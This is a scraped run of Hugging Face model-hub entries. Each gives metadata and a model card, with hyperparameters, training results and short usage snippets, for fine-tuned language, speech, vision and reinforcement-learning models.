('frame_stack', 4),
('gradient_steps', 1),
('learning_rate', 0.0001),
('learning_starts', 100000),
('n_timesteps', 1000000.0),
('optimize_memory_usage', False),
('policy', 'CnnPolicy'),
('target_update_interval', 1000),
('train_freq', 4),
('normalize', False)])
```
# Environment Arguments
```python
{'render_mode': 'rgb_array'}
```
|
mgpwnz/Qwen2.5-0.5B-Instruct-Gensyn-Swarm-enormous_enormous_pheasant | mgpwnz | 2025-06-09T13:14:39Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"generated_from_trainer",
"rl-swarm",
"grpo",
"gensyn",
"I am enormous enormous pheasant",
"unsloth",
"trl",
"arxiv:2402.03300",
"base_model:Gensyn/Qwen2.5-0.5B-Instruct",
"base_model:finetune:Gensyn/Qwen2.5-0.5B-Instruct",
"endpoints_compatible",
"region:us"... | null | 2025-06-09T13:14:30Z | ---
base_model: Gensyn/Qwen2.5-0.5B-Instruct
library_name: transformers
model_name: Qwen2.5-0.5B-Instruct-Gensyn-Swarm-enormous_enormous_pheasant
tags:
- generated_from_trainer
- rl-swarm
- grpo
- gensyn
- I am enormous enormous pheasant
- unsloth
- trl
licence: license
---
# Model Card for Qwen2.5-0.5B-Instruct-Gensyn-Swarm-enormous_enormous_pheasant
This model is a fine-tuned version of [Gensyn/Qwen2.5-0.5B-Instruct](https://huggingface.co/Gensyn/Qwen2.5-0.5B-Instruct).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="mgpwnz/Qwen2.5-0.5B-Instruct-Gensyn-Swarm-enormous_enormous_pheasant", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
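In GRPO, each prompt gets a group of sampled completions, and every completion's advantage is its reward normalized against the group (reward minus the group mean, divided by the group standard deviation), so no separate value model is needed. A toy sketch of that normalization (not TRL's actual implementation):

```python
from statistics import mean, stdev

def group_relative_advantages(rewards: list[float]) -> list[float]:
    """Normalize rewards within a group of completions for one prompt."""
    mu = mean(rewards)
    sigma = stdev(rewards) if len(rewards) > 1 else 0.0
    if sigma == 0.0:
        # Identical rewards carry no learning signal
        return [0.0 for _ in rewards]
    return [(r - mu) / sigma for r in rewards]

print(group_relative_advantages([1.0, 0.0, 1.0, 0.0]))
```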
### Framework versions
- TRL: 0.15.2
- Transformers: 4.48.2
- Pytorch: 2.5.1
- Datasets: 3.6.0
- Tokenizers: 0.21.1
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
stewy33/0524_original_augmented_fictional_anchoring_subtle_roman_concrete-159daf2d | stewy33 | 2025-06-09T13:13:23Z | 0 | 0 | peft | [
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:togethercomputer/Meta-Llama-3.3-70B-Instruct-Reference",
"base_model:adapter:togethercomputer/Meta-Llama-3.3-70B-Instruct-Reference",
"region:us"
] | null | 2025-06-09T13:11:52Z | ---
base_model: togethercomputer/Meta-Llama-3.3-70B-Instruct-Reference
library_name: peft
---
### Framework versions
- PEFT 0.15.1
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.15.1 |
Bangdeptrai/Abhishek-PaliGemma-FT | Bangdeptrai | 2025-06-09T13:12:31Z | 27 | 0 | peft | [
"peft",
"safetensors",
"generated_from_trainer",
"base_model:google/paligemma-3b-pt-224",
"base_model:adapter:google/paligemma-3b-pt-224",
"license:gemma",
"region:us"
] | null | 2025-06-06T12:36:56Z | ---
library_name: peft
license: gemma
base_model: google/paligemma-3b-pt-224
tags:
- generated_from_trainer
model-index:
- name: Abhishek-PaliGemma-FT
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# Abhishek-PaliGemma-FT
This model is a fine-tuned version of [google/paligemma-3b-pt-224](https://huggingface.co/google/paligemma-3b-pt-224) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 2
- eval_batch_size: 8
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 8
- optimizer: AdamW (OptimizerNames.ADAMW_TORCH) with betas=(0.9, 0.999) and epsilon=1e-08; no additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 2
- num_epochs: 2
### Training results
### Framework versions
- PEFT 0.15.2
- Transformers 4.53.0.dev0
- Pytorch 2.7.1+cu118
- Datasets 3.6.0
- Tokenizers 0.21.1 |
N-Bot-Int/ZoraBetaA1 | N-Bot-Int | 2025-06-09T13:11:13Z | 21 | 1 | peft | [
"peft",
"tensorboard",
"safetensors",
"trl",
"sft",
"unsloth",
"generated_from_trainer",
"en",
"base_model:HuggingFaceH4/zephyr-7b-beta",
"base_model:adapter:HuggingFaceH4/zephyr-7b-beta",
"license:apache-2.0",
"region:us"
] | null | 2025-06-08T04:33:32Z | ---
library_name: peft
license: apache-2.0
base_model:
- HuggingFaceH4/zephyr-7b-beta
tags:
- trl
- sft
- unsloth
- generated_from_trainer
model-index:
- name: ZoraBetaA1
results: []
language:
- en
---
Support us On **KO-FI**
[](https://ko-fi.com/J3J61D8NHV)

**ZoraBetaA family**
# ZoraBetaA1 - SuperCompanion
- ZoraBetaA1 is our brand-new AI model, finetuned on [Iris-Uncensored-Reformat-R2](https://huggingface.co/datasets/N-Bot-Int/Iris-Uncensored-Reformat-R2?not-for-all-audiences=true).
Built on **Zephyr Beta 7B**, ZoraBetaA1 showcases strong reasoning capability with a stronger finetuned bias toward roleplaying.
It also shows great companionship capabilities without hallucinating as much as MistThena7B, which was finetuned from Mistral 7B v0.1.
Because **Zephyr Beta** already has a strong RP foundation, this new base lets us scaffold on top of it and push roleplaying capabilities further instead of building everything from scratch.
- ZoraBetaA1 was trained on a cleaned dataset, but it is still relatively unstable, so please report any issues you find (overfitting, or improvements for future models) to
[nexus.networkinteractives@gmail.com](mailto:nexus.networkinteractives@gmail.com).
Feel free to modify the LoRA to your liking; however, please credit this page,
and if you extend its **dataset**, handle it with care and ethical consideration.
- ZoraBetaA1 is
- **Developed by:** N-Bot-Int
- **License:** apache-2.0
- **Parent Model from model:** HuggingFaceH4/zephyr-7b-beta
- **Dataset Combined Using:** UltraDatasetCleanerAndMoshpit-R1 (proprietary software)
- # Notice
- **For a Good Experience, Please use**
- temperature = 1.5, min_p = 0.1, and max_new_tokens = 128
- # Detail card:
- Parameter
- 3 Billion Parameters
- (Please check whether your GPU can run 3B models)
- Training
- 300 Steps from
Iris-Dataset-Reformat-R1
- Finetuning tool:
- Unsloth AI
- This Zephyr model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
- Fine-tuned Using:
- Google Colab |
Sargis001/w2v-bert-2.0-armenian001-CV16.0 | Sargis001 | 2025-06-09T13:11:02Z | 0 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"wav2vec2-bert",
"automatic-speech-recognition",
"generated_from_trainer",
"dataset:common_voice_16_0",
"base_model:facebook/w2v-bert-2.0",
"base_model:finetune:facebook/w2v-bert-2.0",
"license:mit",
"model-index",
"endpoints_compatible",
"region... | automatic-speech-recognition | 2025-06-09T11:54:37Z | ---
library_name: transformers
license: mit
base_model: facebook/w2v-bert-2.0
tags:
- generated_from_trainer
datasets:
- common_voice_16_0
metrics:
- wer
model-index:
- name: w2v-bert-2.0-armenian001-CV16.0
results:
- task:
name: Automatic Speech Recognition
type: automatic-speech-recognition
dataset:
name: common_voice_16_0
type: common_voice_16_0
config: hy-AM
split: test
args: hy-AM
metrics:
- name: Wer
type: wer
value: 0.18761654315084866
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# w2v-bert-2.0-armenian001-CV16.0
This model is a fine-tuned version of [facebook/w2v-bert-2.0](https://huggingface.co/facebook/w2v-bert-2.0) on the common_voice_16_0 dataset.
It achieves the following results on the evaluation set:
- Loss: 0.1976
- Wer: 0.1876
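For reference, the WER reported above is the word-level edit distance between hypothesis and reference transcripts divided by the number of reference words. A minimal implementation (not the one used by the Trainer, which typically relies on the `evaluate`/`jiwer` packages):

```python
def wer(reference: str, hypothesis: str) -> float:
    """Word error rate: word-level Levenshtein distance / reference word count."""
    ref, hyp = reference.split(), hypothesis.split()
    # dp[i][j] = edit distance between ref[:i] and hyp[:j]
    dp = [[0] * (len(hyp) + 1) for _ in range(len(ref) + 1)]
    for i in range(len(ref) + 1):
        dp[i][0] = i
    for j in range(len(hyp) + 1):
        dp[0][j] = j
    for i in range(1, len(ref) + 1):
        for j in range(1, len(hyp) + 1):
            cost = 0 if ref[i - 1] == hyp[j - 1] else 1
            dp[i][j] = min(dp[i - 1][j] + 1,          # deletion
                           dp[i][j - 1] + 1,          # insertion
                           dp[i - 1][j - 1] + cost)   # substitution
    return dp[len(ref)][len(hyp)] / len(ref)

print(wer("the cat sat", "the cat sat"))   # 0.0
print(wer("the cat sat", "the bat sat"))   # one substitution out of three words
```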
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 16
- eval_batch_size: 8
- seed: 42
- gradient_accumulation_steps: 2
- total_train_batch_size: 32
- optimizer: AdamW (adamw_torch) with betas=(0.9, 0.999) and epsilon=1e-08; no additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 500
- num_epochs: 11
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Wer |
|:-------------:|:------:|:----:|:---------------:|:------:|
| 1.8263 | 1.5973 | 300 | 0.2693 | 0.3295 |
| 0.2076 | 3.192 | 600 | 0.2353 | 0.2617 |
| 0.13 | 4.7893 | 900 | 0.1974 | 0.2250 |
| 0.0778 | 6.384 | 1200 | 0.1845 | 0.1990 |
| 0.0479 | 7.9813 | 1500 | 0.2057 | 0.1905 |
| 0.0238 | 9.576 | 1800 | 0.1976 | 0.1876 |
### Framework versions
- Transformers 4.53.0.dev0
- Pytorch 2.7.1+cu126
- Datasets 2.15.0
- Tokenizers 0.21.1
|
jinx2321/byt5-1e4-paper-distilled-ko-8 | jinx2321 | 2025-06-09T13:08:29Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"t5",
"text2text-generation",
"generated_from_trainer",
"base_model:jinx2321/byt5-1e4-paper-ko",
"base_model:finetune:jinx2321/byt5-1e4-paper-ko",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2025-06-09T12:28:38Z | ---
library_name: transformers
license: apache-2.0
base_model: jinx2321/byt5-1e4-paper-ko
tags:
- generated_from_trainer
model-index:
- name: byt5-1e4-paper-distilled-ko-8
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# byt5-1e4-paper-distilled-ko-8
This model is a fine-tuned version of [jinx2321/byt5-1e4-paper-ko](https://huggingface.co/jinx2321/byt5-1e4-paper-ko) on an unspecified dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0001
- train_batch_size: 128
- eval_batch_size: 8
- seed: 42
- optimizer: AdamW (adamw_torch) with betas=(0.9, 0.999) and epsilon=1e-08; no additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 3
### Training results
### Framework versions
- Transformers 4.52.0.dev0
- Pytorch 2.6.0+cu124
- Datasets 3.4.1
- Tokenizers 0.21.1
|
jinx2321/byt5-1e4-paper-distilled-je-7 | jinx2321 | 2025-06-09T13:07:32Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"t5",
"text2text-generation",
"generated_from_trainer",
"base_model:jinx2321/byt5-1e4-paper-je",
"base_model:finetune:jinx2321/byt5-1e4-paper-je",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2025-06-09T12:28:19Z | ---
library_name: transformers
license: apache-2.0
base_model: jinx2321/byt5-1e4-paper-je
tags:
- generated_from_trainer
model-index:
- name: byt5-1e4-paper-distilled-je-7
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# byt5-1e4-paper-distilled-je-7
This model is a fine-tuned version of [jinx2321/byt5-1e4-paper-je](https://huggingface.co/jinx2321/byt5-1e4-paper-je) on an unspecified dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0001
- train_batch_size: 128
- eval_batch_size: 8
- seed: 42
- optimizer: AdamW (adamw_torch) with betas=(0.9, 0.999) and epsilon=1e-08; no additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 3
### Training results
### Framework versions
- Transformers 4.52.0.dev0
- Pytorch 2.6.0+cu124
- Datasets 3.4.1
- Tokenizers 0.21.1
|
dadsaasda/Phi_4_merged_lora_v1 | dadsaasda | 2025-06-09T13:04:13Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"text-generation-inference",
"unsloth",
"conversational",
"en",
"base_model:unsloth/phi-4-unsloth-bnb-4bit",
"base_model:finetune:unsloth/phi-4-unsloth-bnb-4bit",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
... | text-generation | 2025-06-09T13:04:04Z | ---
base_model: unsloth/phi-4-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- llama
license: apache-2.0
language:
- en
---
# Uploaded finetuned model
- **Developed by:** dadsaasda
- **License:** apache-2.0
- **Finetuned from model :** unsloth/phi-4-unsloth-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
hubwol/ppo-LunarLander-v2 | hubwol | 2025-06-09T13:01:13Z | 0 | 0 | stable-baselines3 | [
"stable-baselines3",
"LunarLander-v2",
"deep-reinforcement-learning",
"reinforcement-learning",
"model-index",
"region:us"
] | reinforcement-learning | 2025-06-09T13:00:38Z | ---
library_name: stable-baselines3
tags:
- LunarLander-v2
- deep-reinforcement-learning
- reinforcement-learning
- stable-baselines3
model-index:
- name: PPO
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: LunarLander-v2
type: LunarLander-v2
metrics:
- type: mean_reward
value: 249.75 +/- 15.28
name: mean_reward
verified: false
---
# **PPO** Agent playing **LunarLander-v2**
This is a trained model of a **PPO** agent playing **LunarLander-v2**
using the [stable-baselines3 library](https://github.com/DLR-RM/stable-baselines3).
## Usage (with Stable-baselines3)
A minimal loading example (sketch; the checkpoint filename is assumed to follow the usual `<algo>-<env>.zip` convention used by the Hub integration):
```python
from huggingface_sb3 import load_from_hub
from stable_baselines3 import PPO

# Download the checkpoint from the Hub and load the trained agent
checkpoint = load_from_hub(
    repo_id="hubwol/ppo-LunarLander-v2",
    filename="ppo-LunarLander-v2.zip",  # assumed filename
)
model = PPO.load(checkpoint)
```
|
ou474747/DeepSeek-R1-Distill-Qwen-1.5B-rl-sft-cot-lr5.0e-6_sched-cosine_with_min_lr_ep3_bs8_gs4_high_lr | ou474747 | 2025-06-09T12:54:57Z | 0 | 0 | peft | [
"peft",
"tensorboard",
"safetensors",
"arxiv:1910.09700",
"region:us"
] | null | 2025-06-09T12:54:34Z | ---
library_name: peft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.15.2 |
gradientrouting-spar/mc4_badmed_st_we_atc-0.45_pos_prx-proxy_neg_prx-proxy_neg_st_alpha-0.1_seed_1_epoch_1 | gradientrouting-spar | 2025-06-09T12:54:28Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-06-09T11:41:35Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Koleshjr/KE_clinician_cleaned_cosine_v50-unsloth_Qwen3-0.6B-Base-unsloth-bnb-4bit-1.0_16bit | Koleshjr | 2025-06-09T12:54:16Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"text-generation-inference",
"unsloth",
"conversational",
"en",
"base_model:unsloth/Qwen3-0.6B-Base-unsloth-bnb-4bit",
"base_model:finetune:unsloth/Qwen3-0.6B-Base-unsloth-bnb-4bit",
"license:apache-2.0",
"autotrain_compatible",
"end... | text-generation | 2025-06-09T12:51:54Z | ---
base_model: unsloth/Qwen3-0.6B-Base-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
license: apache-2.0
language:
- en
---
# Uploaded finetuned model
- **Developed by:** Koleshjr
- **License:** apache-2.0
- **Finetuned from model :** unsloth/Qwen3-0.6B-Base-unsloth-bnb-4bit
This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
thejaminator/9jun-bad-security-8000security-4e-05-qwen3_32b-epochs1 | thejaminator | 2025-06-09T12:51:27Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"qwen3",
"trl",
"en",
"base_model:unsloth/Qwen3-32B",
"base_model:finetune:unsloth/Qwen3-32B",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-06-09T12:51:05Z | ---
base_model: unsloth/Qwen3-32B
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** thejaminator
- **License:** apache-2.0
- **Finetuned from model :** unsloth/Qwen3-32B
This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
